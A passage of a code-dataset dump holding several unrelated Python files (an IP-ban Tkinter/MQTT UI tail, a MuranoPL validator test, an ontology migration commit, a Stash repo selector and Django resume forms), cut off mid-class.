q3.put(urlTe)\r\ndef click_btnTelOpt39():\r\n btnTelOpt39.config(fg=\"red\")\r\n btnTel39.config(fg=\"black\")\r\n btnTelOpt49.config(fg=\"black\")\r\n btnTelRu.config(fg=\"black\")\r\n btnTel49.config(fg=\"black\")\r\n btnTel.config(fg=\"black\")\r\n btnTelOpt34.config(fg=\"black\")\r\n urlTe = urlTelOpt39\r\n urlChangeFlag = \"Tel\"\r\n q3.put(urlChangeFlag)\r\n q3.put(urlTe)\r\ndef click_btnTelOpt34():\r\n btnTelOpt34.config(fg=\"red\")\r\n btnTelRu.config(fg=\"black\")\r\n btnTelOpt39.config(fg=\"black\")\r\n btnTel39.config(fg=\"black\")\r\n btnTelOpt49.config(fg=\"black\")\r\n btnTel49.config(fg=\"black\")\r\n btnTel.config(fg=\"black\")\r\n urlTe = urlTelOpt34\r\n urlChangeFlag = \"Tel\"\r\n q3.put(urlChangeFlag)\r\n q3.put(urlTe)\r\ndef click_btnKom34():\r\n btnKom34.config(fg=\"red\")\r\n btnKomOpt34.config(fg=\"black\")\r\n btnKom39.config(fg=\"black\")\r\n btnKomOpt39.config(fg=\"black\")\r\n btnKom43.config(fg=\"black\")\r\n urlKo = urlKomRu34\r\n urlChangeFlag = \"Ko\"\r\n q3.put(urlChangeFlag)\r\n q3.put(urlKo)\r\ndef click_btnKomOpt34():\r\n btnKomOpt34.config(fg=\"red\")\r\n btnKom34.config(fg=\"black\")\r\n btnKom39.config(fg=\"black\")\r\n btnKomOpt39.config(fg=\"black\")\r\n btnKom43.config(fg=\"black\")\r\n urlKo = urlKomOpt34\r\n urlChangeFlag = \"Ko\"\r\n q3.put(urlChangeFlag)\r\n q3.put(urlKo)\r\ndef click_btnKom39():\r\n btnKom39.config(fg=\"red\")\r\n btnKomOpt39.config(fg=\"black\")\r\n btnKom34.config(fg=\"black\")\r\n btnKomOpt34.config(fg=\"black\")\r\n btnKom43.config(fg=\"black\")\r\n urlKo = urlKomRu39\r\n urlChangeFlag = \"Ko\"\r\n q3.put(urlChangeFlag)\r\n q3.put(urlKo)\r\ndef click_btnKomOpt39():\r\n btnKomOpt39.config(fg=\"red\")\r\n btnKom39.config(fg=\"black\")\r\n btnKom34.config(fg=\"black\")\r\n btnKomOpt34.config(fg=\"black\")\r\n btnKom43.config(fg=\"black\")\r\n urlKo = urlKomOpt39\r\n urlChangeFlag = \"Ko\"\r\n q3.put(urlChangeFlag)\r\n q3.put(urlKo)\r\ndef click_btnKom43():\r\n btnKom43.config(fg=\"red\")\r\n btnKom39.config(fg=\"black\")\r\n btnKomOpt39.config(fg=\"black\")\r\n btnKom34.config(fg=\"black\")\r\n btnKomOpt34.config(fg=\"black\")\r\n urlKo = urlKomRu43\r\n urlChangeFlag = 
\"Ko\"\r\n q3.put(urlChangeFlag)\r\n q3.put(urlKo)\r\n\r\ndef click_btnLogin():\r\n global inputValue\r\n inputValue = 1\r\n\r\ndef confirmExit():\r\n root.quit()\r\n root.destroy()\r\n\r\ndef scrollTextOut(txt):\r\n console.configure(state='normal') # enable insert\r\n console.insert(END, txt + '\\n')\r\n console.yview(END) # autoscroll\r\n console.configure(state='disabled') # disable editing\r\n\r\ndriver = webdriver.Chrome(executable_path = 'C:\\chromedriver.exe')\r\n# Открыть новую пустую вкладку\r\ndriver.execute_script(\"window.open('','_blank');\")\r\ndriver.execute_script(\"window.open('','_blank');\")\r\n# вернуться на предыдущую вкладку (с индексом 0)\r\ndriver.switch_to.window(driver.window_handles[0])\r\n\r\nt = threading.Thread(target = worker) #start logger\r\nworker_flag = True\r\n#t.start() #start logging thread\r\n\r\nt2 = threading.Thread(target = worker2)\r\nworker2_flag = True\r\n#t2.start()\r\n\r\nclient = paho.Client()\r\nclient.on_message = on_message\r\nclient.connect(broker)\r\nclient.subscribe(Topics)\r\nclient.loop_start()\r\n\r\n#root = Tk()\r\nroot.title(\"банер по IP\")\r\nroot.geometry(\"1200x150+20+800\")\r\n\r\nbtnTel = Button(text=\"Tel\", padx=\"20\", pady=\"8\",command = click_btnTel)\r\nbtnTel.place(x=10, y=5,height=30, width=50)\r\nbtnTelRu = Button(text=\"TelRu\", padx=\"20\", pady=\"8\",command = click_btnTelRu)\r\nbtnTelRu.place(x=70, y=5,height=30, width=50)\r\nbtnTel49 = Button(text=\"Tel49\", padx=\"20\", pady=\"8\",command = click_btnTel49)\r\nbtnTel49.place(x=140, y=5,height=30, width=50)\r\nbtnTelOpt49 = Button(text=\"TelOp49\", padx=\"20\", pady=\"8\",command = click_btnTelOpt49)\r\nbtnTelOpt49.place(x=210, y=5,height=30, width=50)\r\nbtnTel39 = Button(text=\"Tel39\", padx=\"20\", pady=\"8\",command = click_btnTel39)\r\nbtnTel39.place(x=280, y=5,height=30, width=50)\r\nbtnTelOpt39 = Button(text=\"TelOp39\", padx=\"20\", pady=\"8\",command = click_btnTelOpt39)\r\nbtnTelOpt39.place(x=350, y=5,height=30, width=50)\r\nbtnTelOpt34 = Button(text=\"TelOp34\", padx=\"20\", pady=\"8\",command = click_btnTelOpt34)\r\nbtnTelOpt34.place(x=420, y=5,height=30, width=50)\r\nbtnKom34 = Button(text=\"Kom34\", padx=\"20\", pady=\"8\",command = click_btnKom34)\r\nbtnKom34.place(x=490, y=5,height=30, width=50)\r\nbtnKomOpt34 = Button(text=\"KomOp34\", padx=\"20\", pady=\"8\",command = click_btnKomOpt34)\r\nbtnKomOpt34.place(x=560, y=5,height=30, width=50)\r\nbtnKom39 = Button(text=\"Kom39\", padx=\"20\", pady=\"8\",command = click_btnKom39)\r\nbtnKom39.place(x=630, y=5,height=30, width=50)\r\nbtnKomOpt39 = Button(text=\"KomOp39\", padx=\"20\", pady=\"8\",command = click_btnKomOpt39)\r\nbtnKomOpt39.place(x=700, y=5,height=30, width=50)\r\nbtnKom43 = Button(text=\"Kom43\", padx=\"20\", pady=\"8\",command = click_btnKom43)\r\nbtnKom43.place(x=770, y=5,height=30, width=50)\r\nbtnLogin = Button(text=\"Login\", padx=\"20\", pady=\"18\",command = click_btnLogin)\r\nbtnLogin.place(x=870, y=5,height=30, width=50)\r\n\r\nlabelIP = Label(root,text = \"IP\")\r\nlabelIP.place(x=10, y=40)\r\nlabelConsole = Label(root,text = \"Print\")\r\nlabelConsole.place(x=300, y=40)\r\nconsole = scrolledtext.ScrolledText(root, state='disable')\r\nconsole.place(x=10, y=60, width = 1190)\r\n\r\nt.start()\r\nt2.start()\r\nroot.protocol('WM_DELETE_WINDOW', confirmExit)\r\nroot.mainloop()\r\ntry:\r\n while True:\r\n pass\r\n\r\nexcept KeyboardInterrupt:\r\n print(\"interrrupted by keyboard\")\r\n 
root.destroy()\r\n","sub_path":"Mongo_Find_Repit_Ban_IP_UI.py","file_name":"Mongo_Find_Repit_Ban_IP_UI.py","file_ext":"py","file_size_in_byte":23712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"571633331","text":"# Copyright (c) 2016 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom copy import deepcopy\nimport unittest\nimport yaml\n\nfrom mplcheck.validators.muranopl import MuranoPLValidator\n\n\nMURANOPL_BASE = {\n 'Name': 'Instance',\n 'Namespaces': {\n '=': 'org.openstack.test',\n 'res': 'io.murano.resources',\n 'std': 'io.murano'},\n 'Extends': 'res:LinuxMuranoInstance',\n 'Properties': {\n 'ports': {\n 'Contract': [\n '$.class(NeutronPort).notNull()'],\n 'Default': []}},\n 'Methods': {\n 'prepareStackTemplate': {\n 'Scope': 'Public',\n 'Arguments': {\n 'instanceTemplate': {'Contract': {}}},\n 'Body': [\n {'Do': [\n '$port.deploy()',\n {'$template': {\n 'resources': {\n '$.name': {\n 'properties': {\n 'networks': [\n {'port': '$port.getRef()'}]}}}}},\n {'$instanceTemplate':\n '$instanceTemplate.mergeWith($template)'}],\n 'For': 'port',\n 'In': '$.ports'},\n {'Return': '$instanceTemplate'}]}},\n}\n\n\nclass MuranoPlTests(unittest.TestCase):\n def setUp(self):\n self.mpl_validator = MuranoPLValidator()\n\n def test_success(self):\n mpl = yaml.dump(MURANOPL_BASE)\n self.mpl_validator.parse(mpl)\n result = [r for r in self.mpl_validator.validate()]\n self.assertEqual(0, len(result))\n\n def test_no_name_in_file(self):\n mpl_dict = deepcopy(MURANOPL_BASE)\n del mpl_dict['Name']\n mpl = yaml.dump(mpl_dict)\n self.mpl_validator.parse(mpl)\n result = [r for r in self.mpl_validator.validate()]\n self.assertEqual(0, len(result))\n\n def test_double_underscored_name(self):\n mpl_dict = deepcopy(MURANOPL_BASE)\n mpl_dict['Name'] = '__Instance'\n mpl = yaml.dump(mpl_dict)\n self.mpl_validator.parse(mpl)\n result = [r for r in self.mpl_validator.validate()]\n self.assertEqual(1, len(result))\n report = result[0]\n self.assertIn('Invalid class name \"__Instance\"', report.message)\n self.assertEqual(21, report.line)\n self.assertEqual(7, report.column)\n\n def test_not_camel_case_name(self):\n mpl_dict = deepcopy(MURANOPL_BASE)\n mpl_dict['Name'] = 'notcamelcase'\n mpl = yaml.dump(mpl_dict)\n self.mpl_validator.parse(mpl)\n result = [r for r in self.mpl_validator.validate()]\n self.assertEqual(1, len(result))\n report = result[0]\n self.assertIn('Invalid class name \"notcamelcase\"',\n result[0].message)\n self.assertEqual(21, report.line)\n self.assertEqual(7, report.column)\n\n def test_whitespace_in_name(self):\n mpl_dict = deepcopy(MURANOPL_BASE)\n mpl_dict['Name'] = 'white space'\n mpl = yaml.dump(mpl_dict)\n self.mpl_validator.parse(mpl)\n result = [r for r in self.mpl_validator.validate()]\n self.assertEqual(1, len(result))\n report = result[0]\n self.assertIn('Invalid class name \"white space\"',\n report.message)\n self.assertEqual(21, report.line)\n self.assertEqual(7, report.column)\n\n def 
test_properties_usage(self):\n mpl_dict = deepcopy(MURANOPL_BASE)\n mpl_dict['Properties']['ports']['Usage'] = 'OutIn'\n mpl = yaml.dump(mpl_dict)\n self.mpl_validator.parse(mpl)\n result = [r for r in self.mpl_validator.validate()]\n self.assertEqual(1, len(result))\n report = result[0]\n self.assertIn('Not allowed usage \"OutIn\"',\n report.message)\n self.assertEqual(27, report.line)\n self.assertEqual(12, report.column)\n\n def test_wrong_type_namespace(self):\n mpl_dict = deepcopy(MURANOPL_BASE)\n mpl_dict['Namespaces'] = [1, 2, 3]\n mpl = yaml.dump(mpl_dict)\n self.mpl_validator.parse(mpl)\n result = [r for r in self.mpl_validator.validate()]\n self.assertEqual(1, len(result))\n report = result[0]\n self.assertIn('Wrong type of namespace',\n report.message)\n self.assertEqual(22, report.line)\n self.assertEqual(13, report.column)\n\n def test_wrong_method_scope(self):\n mpl_dict = deepcopy(MURANOPL_BASE)\n mpl_dict['Methods']['prepareStackTemplate']['Scope'] = 'Wrong'\n mpl = yaml.dump(mpl_dict)\n self.mpl_validator.parse(mpl)\n result = [r for r in self.mpl_validator.validate()]\n self.assertEqual(1, len(result))\n report = result[0]\n self.assertIn('Wrong Scope \"Wrong\"',\n report.message)\n self.assertEqual(4, report.line)\n self.assertEqual(5, report.column)\n\n def test_dict_in_body(self):\n mpl_dict = deepcopy(MURANOPL_BASE)\n mpl_dict['Methods']['prepareStackTemplate']['Body'] = {'a': 'b'}\n mpl = yaml.dump(mpl_dict)\n self.mpl_validator.parse(mpl)\n result = [r for r in self.mpl_validator.validate()]\n self.assertEqual(1, len(result))\n report = result[0]\n self.assertIn('Body is not a list or scalar/yaql expression',\n report.message)\n self.assertEqual(7, report.line)\n self.assertEqual(11, report.column)\n","sub_path":"mplcheck/tests/test_muranopl_validator.py","file_name":"test_muranopl_validator.py","file_ext":"py","file_size_in_byte":6031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"405025229","text":"# Copyright (c) 2021, Galois, Inc.\n#\n# All Rights Reserved\n#\n# This material is based upon work supported by the Defense Advanced Research\n# Projects Agency (DARPA) under Contract No. 
FA8750-20-C-0203.\n#\n# Any opinions, findings and conclusions or recommendations expressed in this\n# material are those of the author(s) and do not necessarily reflect the views\n# of the Defense Advanced Research Projects Agency (DARPA).\n\nfrom migration_helpers.name_space import rack\nfrom ontology_changes import (\n    AtMost,\n    ChangeCardinality,\n    ChangePropertyIsATypeOf,\n    ChangePropertyRange,\n    Commit,\n    RenameProperty,\n    SingleValue,\n)\n\nFILE = rack(\"FILE\")\nPROV_S = rack(\"PROV-S\")\nSOFTWARE = rack(\"SOFTWARE\")\n\ncommit = Commit(\n    number=\"643839e7d8036731ba1da767942c8e74c2876e2e\",\n    changes=[\n        # FILE.sadl\n        ChangeCardinality(\n            name_space=FILE,\n            class_id=\"FILE\",\n            property_id=\"filename\",\n            to_cardinality=SingleValue(),\n        ),\n        RenameProperty(\n            from_name_space=FILE,\n            from_class=\"FILE\",\n            from_name=\"fileParent\",\n            to_name_space=FILE,\n            to_class=\"FILE\",\n            to_name=\"definedIn\",\n        ),\n        ChangePropertyIsATypeOf(\n            name_space=FILE,\n            class_id=\"FILE\",\n            property_id=\"satisfies\",\n            from_name_space=PROV_S,\n            from_property_id=\"wasDerivedFrom\",\n            to_name_space=PROV_S,\n            to_property_id=\"wasImpactedBy\",\n        ),\n        ChangeCardinality(\n            name_space=FILE,\n            class_id=\"FILE\",\n            property_id=\"createBy\",\n            to_cardinality=AtMost(1),\n        ),\n        # FILE.sadl / SOFTWARE.sadl\n        RenameProperty(\n            from_name_space=SOFTWARE,\n            from_class=\"FILE\",\n            from_name=\"definedIn\",\n            to_name_space=FILE,\n            to_class=\"FILE\",\n            to_name=\"definedIn\",\n        ),\n        ChangePropertyRange(\n            prop_name_space=FILE,\n            prop_name=\"definedIn\",\n            from_name_space=PROV_S,\n            from_range=\"ENTITY\",\n            to_name_space=FILE,\n            to_range=\"FILE\",\n        ),\n    ],\n)\n","sub_path":"migration/rack/commits/commit643839e7d8036731ba1da767942c8e74c2876e2e.py","file_name":"commit643839e7d8036731ba1da767942c8e74c2876e2e.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"328194660","text":"from server.repo.stashaccesser import StashAccesser\nimport json\nimport os\n\nclass RepoSelector(object):\n\tdef __init__(self):\n\t\tself.accesser = StashAccesser()\n\t\tself.file_path = os.path.dirname(__file__)\n\t\tself.config = json.load(open(os.path.join(self.file_path, '..\\\\config\\\\repos.json')))\n\n\tdef _is_updated_repo(self, repo):\n\t\tcommit = self.accesser.last_commit(repo['project']['key'], repo['slug'])\n\t\tif commit is None:\n\t\t\treturn False\n\t\tif (repo['slug'] not in self.config) or (self.config[repo['slug']] != commit['id']):\n\t\t\tself.config[repo['slug']] = commit['id']\n\t\t\treturn True\n\t\treturn False\n\n\tdef _is_front_end_repo(self, repo):\n\t\tfiles = self.accesser.files(repo['project']['key'], repo['slug'])\n\t\treturn 'package.json' in files\n\n\tdef _save(self):\n\t\tjson.dump(self.config, open(os.path.join(self.file_path, '..\\\\config\\\\repos.json'), 'w'))\n\n\tdef front_end_repos(self):\n\t\tself.accesser.login()\n\t\trepos = self.accesser.repos()\n\t\tresult = []\n\t\tfor repo in repos:\n\t\t\tprint(\"Start:\" + repo['slug'])\n\t\t\tif self._is_updated_repo(repo) and self._is_front_end_repo(repo):\n\t\t\t\tprint(repo['project']['key'] + ': ' + repo['slug'])\n\t\t\t\tresult.append(repo)\n\t\t\tprint(\"End:\" + repo['slug'])\n\t\tprint('fer done.')\n\t\tself._save()\n\t\treturn result\n\nif __name__ == \"__main__\":\n\tselector = 
RepoSelector()\n\tselector.front_end_repos()\n\tprint('End')","sub_path":"server/repo/reposelector.py","file_name":"reposelector.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"389332871","text":"from crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Submit, Button, Div\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.forms import ModelForm, Textarea\nfrom suit_redactor.widgets import RedactorWidget\nfrom employees.constants import *\nfrom employees.models import Resume, Education, WorkExperience, Project, Certification, Skill, TrainingExperience, \\\n IdCard, Card, ContactPerson, Salary, WorkProject, RegularMeeting, DailyReport, Student\n\n\nclass LoginForm(AuthenticationForm):\n def __init__(self, request, *args, **kwargs):\n super(LoginForm, self).__init__(request, *args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_class = 'form-horizontal'\n self.helper.form_method = 'post'\n self.helper.form_action = 'login'\n\n self.helper.field_template = 'bootstrap4/layout/inline_field.html'\n self.helper.layout = Layout(\n 'username',\n 'password',\n Submit('submit', 'Submit', css_class='btn-block')\n )\n\n\nclass ResumeForm(ModelForm):\n class Meta:\n model = Resume\n fields = ['gender', 'native_place', 'nationality', 'birth_date', 'marital_status',\n 'target_position', 'expect_salary', 'expect_salary_intern',\n 'telephone', 'email', 'qq', 'wechat',\n 'english_level', 'english_score',\n 'height', 'weight',\n 'introduction']\n widgets = {\n 'introduction': Textarea(attrs={'rows': 3})\n }\n\n def __init__(self, *args, **kwargs):\n super(ResumeForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'id_resume'\n self.helper.layout = Layout(\n Div(\n Div('gender', css_class='col-xs-2'),\n Div('native_place', css_class='col-xs-2'),\n Div('nationality', css_class='col-xs-2'),\n Div('birth_date', css_class='col-xs-2'),\n Div('height', css_class='col-xs-2'),\n Div('weight', css_class='col-xs-2'),\n css_class='row'\n ),\n Div(\n Div('telephone', css_class='col-xs-3'),\n Div('email', css_class='col-xs-3'),\n Div('qq', css_class='col-xs-3'),\n Div('wechat', css_class='col-xs-3'),\n css_class='row'\n ),\n Div(\n Div('english_level', css_class='col-xs-4'),\n Div('english_score', css_class='col-xs-4'),\n Div('marital_status', css_class='col-xs-4'),\n css_class='row'\n ),\n Div(\n Div('target_position', css_class='col-xs-4'),\n Div('expect_salary', css_class='col-xs-4'),\n Div('expect_salary_intern', css_class='col-xs-4'),\n\n ),\n Div(\n Div('introduction', css_class='col-xs-12'),\n css_class='row'\n )\n )\n\n\nclass EducationFormSetHelper(FormHelper):\n def __init__(self, *args, **kwargs):\n super(EducationFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('school', css_class='col-md-8'),\n Div('major', css_class='col-md-4'),\n css_class='row'\n ),\n Div(\n Div('education', css_class='col-md-3'),\n Div('education_type', css_class='col-md-3'),\n Div('start_date', css_class='col-md-3'),\n Div('end_date', css_class='col-md-3'),\n css_class='row'\n ),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden=\"true\"\n )\n )\n self.layout.extend(['user', 'id'])\n self.all().wrap_together(Div, css_class=EDUCATION_FORMS_PREFIX)\n\n\nclass EducationForm(ModelForm):\n class Meta:\n 
model = Education\n fields = ['school', 'major', 'education', 'education_type', 'start_date', 'end_date']\n\n def __init__(self, *args, **kwargs):\n super(EducationForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'id_education'\n self.helper.layout = Layout(\n Div(\n Div('school', css_class='col-xs-5'),\n Div('major', css_class='col-xs-5'),\n Div('education', css_class='col-xs-5'),\n Div('education_type', css_class='col-xs-5'),\n Div('start_date', css_class='col-xs-5'),\n Div('end_date', css_class='col-xs-5'),\n css_class='form-group'\n ),\n )\n\n\nclass WorkExperienceFormSetHelper(FormHelper):\n def __init__(self, *args, **kwargs):\n super(WorkExperienceFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('company_name', css_class='col-md-5'),\n Div('position', css_class='col-md-3'),\n Div('start_date', css_class='col-md-2'),\n Div('end_date', css_class='col-md-2'),\n css_class='row'\n ),\n Div(\n Div('resignation_reason', css_class='col-md-12'),\n css_class='row'\n ),\n Div(\n Div('description', css_class='col-md-12'),\n css_class='row'\n ),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden=\"true\"\n )\n )\n self.layout.extend(['user', 'id'])\n self.all().wrap_together(Div, css_class=WORK_EXPERIENCE_FORMS_PREFIX)\n\n\nclass WorkExperienceForm(ModelForm):\n class Meta:\n model = WorkExperience\n exclude = ['user']\n widgets = {\n 'description': Textarea(attrs={'rows': 3})\n }\n\n def __init__(self, *args, **kwargs):\n super(WorkExperienceForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'id_workexperience'\n self.helper.layout = Layout(\n Div(\n Div('company_name', css_class='col-xs-5'),\n Div('position', css_class='col-xs-5'),\n Div('description', css_class='col-xs-5'),\n Div('resignation_reason', css_class='col-xs-5'),\n Div('start_date', css_class='col-xs-5'),\n Div('end_date', css_class='col-xs-5'),\n css_class='form-group'\n ),\n )\n\n\nclass ProjectFormSetHelper(FormHelper):\n def __init__(self, *args, **kwargs):\n super(ProjectFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('name', css_class='col-md-8'),\n Div('start_date', css_class='col-md-2'),\n Div('end_date', css_class='col-md-2'),\n css_class='row'\n ),\n Div(\n Div('technology', css_class='col-md-12'),\n css_class='row'\n ),\n Div(\n Div('description', css_class='col-md-12'),\n css_class='row'\n ),\n Div(\n Div('responsibility', css_class='col-md-12'),\n css_class='row'\n ),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden='true'\n )\n )\n self.layout.extend(['user', 'id'])\n self.all().wrap_together(Div, css_class=PROJECT_FORMS_PREFIX)\n\n\nclass ProjectForm(ModelForm):\n class Meta:\n model = Project\n exclude = ['user']\n widgets = {\n 'technology': Textarea(attrs={'rows': 3}),\n 'description': Textarea(attrs={'rows': 3}),\n 'responsibility': Textarea(attrs={'rows': 3}),\n }\n\n\nclass CertificationFormSetHelper(FormHelper):\n def __init__(self, *args, **kwargs):\n super(CertificationFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('name', css_class='col-md-6'),\n Div('remark', css_class='col-md-6'),\n css_class='row'\n ),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block 
btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden='true'\n )\n )\n self.layout.extend(['user', 'id'])\n self.all().wrap_together(Div, css_class=CERTIFICATION_FORMS_PREFIX)\n\n\nclass CertificationForm(ModelForm):\n class Meta:\n model = Certification\n exclude = ['user']\n\n def __init__(self, *args, **kwargs):\n super(CertificationForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'id_certification'\n self.helper.layout = Layout(\n Div(\n Div('name', css_class='col-xs-5'),\n Div('remark', css_class='col-xs-5'),\n css_class='form-group'\n ),\n )\n\n\nclass SkillFormSetHelper(FormHelper):\n def __init__(self, *args, **kwargs):\n super(SkillFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('level', css_class='col-md-2'),\n Div('content', css_class='col-md-10'),\n css_class='row'\n ),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden='true'\n )\n )\n self.layout.extend(['user', 'id'])\n self.all().wrap_together(Div, css_class=SKILL_FORMS_PREFIX)\n\n\nclass SkillForm(ModelForm):\n class Meta:\n model = Skill\n exclude = ['user']\n\n def __init__(self, *args, **kwargs):\n super(SkillForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'id_skill'\n self.helper.layout = Layout(\n Div(\n Div('level', css_class='col-xs-5'),\n Div('content', css_class='col-xs-5'),\n css_class='form-group'\n ),\n )\n\n\nclass TrainingExperienceFormSetHelper(FormHelper):\n def __init__(self, *args, **kwargs):\n super(TrainingExperienceFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('name', css_class='col-md-4'),\n Div('organization_name', css_class='col-md-4'),\n Div('start_date', css_class='col-md-2'),\n Div('end_date', css_class='col-md-2'),\n css_class='row'\n ),\n Div(\n Div('content', css_class='col-md-12'),\n css_class='row'\n ),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden=\"true\"\n )\n )\n self.layout.extend(['user', 'id'])\n self.all().wrap_together(Div, css_class=TRAINING_EXPERIENCE_FORMS_PREFIX)\n\n\nclass TrainingExperienceForm(ModelForm):\n class Meta:\n model = TrainingExperience\n exclude = ['user']\n widgets = {\n 'content': Textarea(attrs={'rows': '3'})\n }\n\n def __init__(self, *args, **kwargs):\n super(TrainingExperienceForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'id_training'\n self.helper.layout = Layout(\n Div(\n Div('name', css_class='col-xs-5'),\n Div('organization_name', css_class='col-xs-5'),\n Div('start_date', css_class='col-xs-5'),\n Div('end_date', css_class='col-xs-5'),\n Div('content', css_class='col-xs-5'),\n css_class='form-group'\n ),\n )\n\n\nclass IdCardForm(ModelForm):\n def __init__(self, *args, **kwargs):\n super(IdCardForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_tag = False\n self.helper.layout = Layout(\n Div(\n Div('id_card_number', css_class='col-md-6'),\n Div('id_card_address', css_class='col-md-6'),\n css_class='row'\n ),\n Div(\n Div('residence_address', css_class='col-md-6'),\n Div('id_card_photo', css_class='col-md-6'),\n css_class='row'\n ),\n )\n\n class Meta:\n model = IdCard\n exclude = ['user']\n\n\nclass CardFormSetHelper(FormHelper):\n def __init__(self, *args, **kwargs):\n 
super(CardFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('number', css_class='col-md-6'),\n Div('bank_name', css_class='col-md-6'),\n css_class='row'\n ),\n Div(\n Div('branch_name', css_class='col-md-6'),\n Div('phone', css_class='col-md-6'),\n css_class='row'\n ),\n Div(Div('is_default', css_class='col-md-12'), css_class='row'),\n Div(Div('remark', css_class='col-md-12'), css_class='row'),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden=\"true\"\n )\n )\n\n self.layout.extend(['user', 'id'])\n self.all().wrap_together(Div, css_class=CARD_FORMS_PREFIX)\n\n\nclass CardForm(ModelForm):\n class Meta:\n model = Card\n exclude = ['user']\n widgets = {\n 'remark': Textarea(attrs={'rows': '3'})\n }\n\n\nclass ContactFormSetHelper(FormHelper):\n def __init__(self, *args, **kwargs):\n super(ContactFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('name', css_class='col-md-3'),\n Div('relationship', css_class='col-md-3'),\n Div('organization', css_class='col-md-3'),\n Div('telephone', css_class='col-md-3'),\n css_class='row'\n ),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden=\"true\"\n )\n )\n\n self.layout.extend(['user', 'id'])\n self.all().wrap_together(Div, css_class=CONTACT_FORMS_PREFIX)\n\n\nclass ContactForm(ModelForm):\n class Meta:\n model = ContactPerson\n exclude = ['user']\n\n\nclass WorkProjectFormSetHelper(FormHelper):\n def __init__(self, *args, **kwargs):\n super(WorkProjectFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('name', css_class='col-md-8'),\n Div('start_time', css_class='col-md-2'),\n Div('end_time', css_class='col-md-2'),\n css_class='row'\n ),\n Div(\n Div('key_skill', css_class='col-md-12'),\n css_class='row'\n ),\n Div(\n Div('description', css_class='col-md-12'),\n css_class='row'\n ),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden='true'\n )\n )\n self.all().wrap_together(Div, css_class=PROJROM_FORMS_PREFIX)\n\n\nclass WorkProjectForm(ModelForm):\n class Meta:\n model = WorkProject\n fields = ('name', 'description', 'key_skill', 'start_time', 'end_time')\n # widgets = {\n # 'key_skill': Textarea(attrs={'rows': 3}),\n # 'description': Textarea(attrs={'rows': 3}),\n # }\n\n\nclass SalaryFormSetHelper(FormHelper):\n def __init__(self, *args, **kwargs):\n super(SalaryFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('salary_level', css_class='col-md-4'),\n Div('salary_proportion', css_class='col-md-4'),\n Div('actual_salary', css_class='col-md-2'),\n css_class='row'\n ),\n Div(\n Div('gross_salary', css_class='col-md-2', function='jisuan'),\n css_class='row'\n ),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden=\"true\"\n )\n )\n self.layout.extend(['user', 'id'])\n self.all().wrap_together(Div, css_class=SALARY_FORMS_PREFIX)\n\n\nclass SalaryForm(ModelForm):\n class Meta:\n model = Salary\n exclude = ['user']\n widgets = {\n 'gross_salary': Textarea(attrs={'readonly': 'readonly', 'onblur': ''}),\n }\n\n\nclass DailyReportFormSetHelper(FormHelper):\n 